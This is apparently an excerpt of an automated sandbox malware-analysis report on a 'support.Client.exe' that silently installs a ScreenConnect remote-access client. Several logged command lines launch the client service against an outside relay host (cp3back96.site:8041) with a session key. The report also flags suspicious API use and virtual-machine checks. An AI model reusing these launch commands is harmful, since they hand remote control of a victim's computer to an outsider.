              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
              Source: ScreenConnect.ClientService.exe, 00000013.00000002.2403914597.00000000012CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
              Source: svchost.exe, 00000004.00000002.2412623067.00000227B8E62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(c
              Source: svchost.exe, 00000009.00000002.2406431788.0000022170465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
              Source: dfsvc.exe, 0000000E.00000002.2367830615.00000212BEF7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: svchost.exe, 00000009.00000002.2405331292.000002217042B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: svchost.exe, 00000009.00000002.2407337158.0000022170490000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "@\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
              Source: svchost.exe, 00000004.00000002.2407570348.00000227B7827000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2413049971.00000227B8E69000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFF0000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2366106744.00000212BEE92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: svchost.exe, 00000009.00000002.2404460863.000002217040B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
              Source: svchost.exe, 00000009.00000002.2407337158.0000022170490000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
              Source: svchost.exe, 00000009.00000002.2407525579.0000022170502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
              Source: svchost.exe, 00000009.00000002.2406431788.0000022170485000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b
              Source: dfsvc.exe, 0000000E.00000002.2359951085.00000212BB938000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information queried: ProcessInformation
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess token adjusted: Debug
              Source: C:\Users\user\Downloads\support.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              .NET source code references suspicious native API functions
              Source: ScreenConnect.ClientService.dll.14.dr, ClientService.csReference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
              Source: ScreenConnect.Windows.dll.14.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
              Source: ScreenConnect.Windows.dll.14.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
              Source: ScreenConnect.Windows.dll.14.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
              Source: ScreenConnect.Windows.dll.14.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session" "1"
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\pbjp0lvb.vxd\ezccovkw.h6b\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\screenconnect.clientservice.exe" "?e=support&y=guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=bgiaaackaabsu0exaagaaaeaaqb9zmuocnsrac12buom5jb%2f0aqdwfmpukdawi13yrxom16w00nll4p0ztehanoxvmcw0wwfebnckj1h1sizr06d2epn5y1la%2fzuaunqxvb6zv6mkv%2fq3pq8o4ikeuzm%2b1utt6bvi8cjhvom7wlyyjcudqab6dwlh4jauc5yebvht8maznaiypqnbmxnwuw1rdlarh5yjbzgptjpijpusdeo4d%2fcutp6cz%2f6lbyci1k6apr4nfjdocsgymmz0uewapw6fnswepa0e3g6vxjqsjxuzxu7nn2pc9y84o5l0uqvktz239upnomzv8wnsyaubzull%2b48fuht%2fyi9uktbmorr&r=&i=untitled%20session" "1"
              Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\pbjp0lvb.vxd\ezccovkw.h6b\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\screenconnect.clientservice.exe" "?e=support&y=guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=bgiaaackaabsu0exaagaaaeaaqb9zmuocnsrac12buom5jb%2f0aqdwfmpukdawi13yrxom16w00nll4p0ztehanoxvmcw0wwfebnckj1h1sizr06d2epn5y1la%2fzuaunqxvb6zv6mkv%2fq3pq8o4ikeuzm%2b1utt6bvi8cjhvom7wlyyjcudqab6dwlh4jauc5yebvht8maznaiypqnbmxnwuw1rdlarh5yjbzgptjpijpusdeo4d%2fcutp6cz%2f6lbyci1k6apr4nfjdocsgymmz0uewapw6fnswepa0e3g6vxjqsjxuzxu7nn2pc9y84o5l0uqvktz239upnomzv8wnsyaubzull%2b48fuht%2fyi9uktbmorr&r=&i=untitled%20session" "1"
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\pbjp0lvb.vxd\ezccovkw.h6b\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\screenconnect.clientservice.exe" "?e=support&y=guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=bgiaaackaabsu0exaagaaaeaaqb9zmuocnsrac12buom5jb%2f0aqdwfmpukdawi13yrxom16w00nll4p0ztehanoxvmcw0wwfebnckj1h1sizr06d2epn5y1la%2fzuaunqxvb6zv6mkv%2fq3pq8o4ikeuzm%2b1utt6bvi8cjhvom7wlyyjcudqab6dwlh4jauc5yebvht8maznaiypqnbmxnwuw1rdlarh5yjbzgptjpijpusdeo4d%2fcutp6cz%2f6lbyci1k6apr4nfjdocsgymmz0uewapw6fnswepa0e3g6vxjqsjxuzxu7nn2pc9y84o5l0uqvktz239upnomzv8wnsyaubzull%2b48fuht%2fyi9uktbmorr&r=&i=untitled%20session" "1"
              Source: ScreenConnect.WindowsClient.exe, 00000011.00000000.1931309778.0000000000782000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.drBinary or memory string: Progman
              Source: ScreenConnect.WindowsClient.exe, 00000011.00000000.1931309778.0000000000782000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\userbril.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\userbrii.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\userbrili.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\userbrib.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\userbriz.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
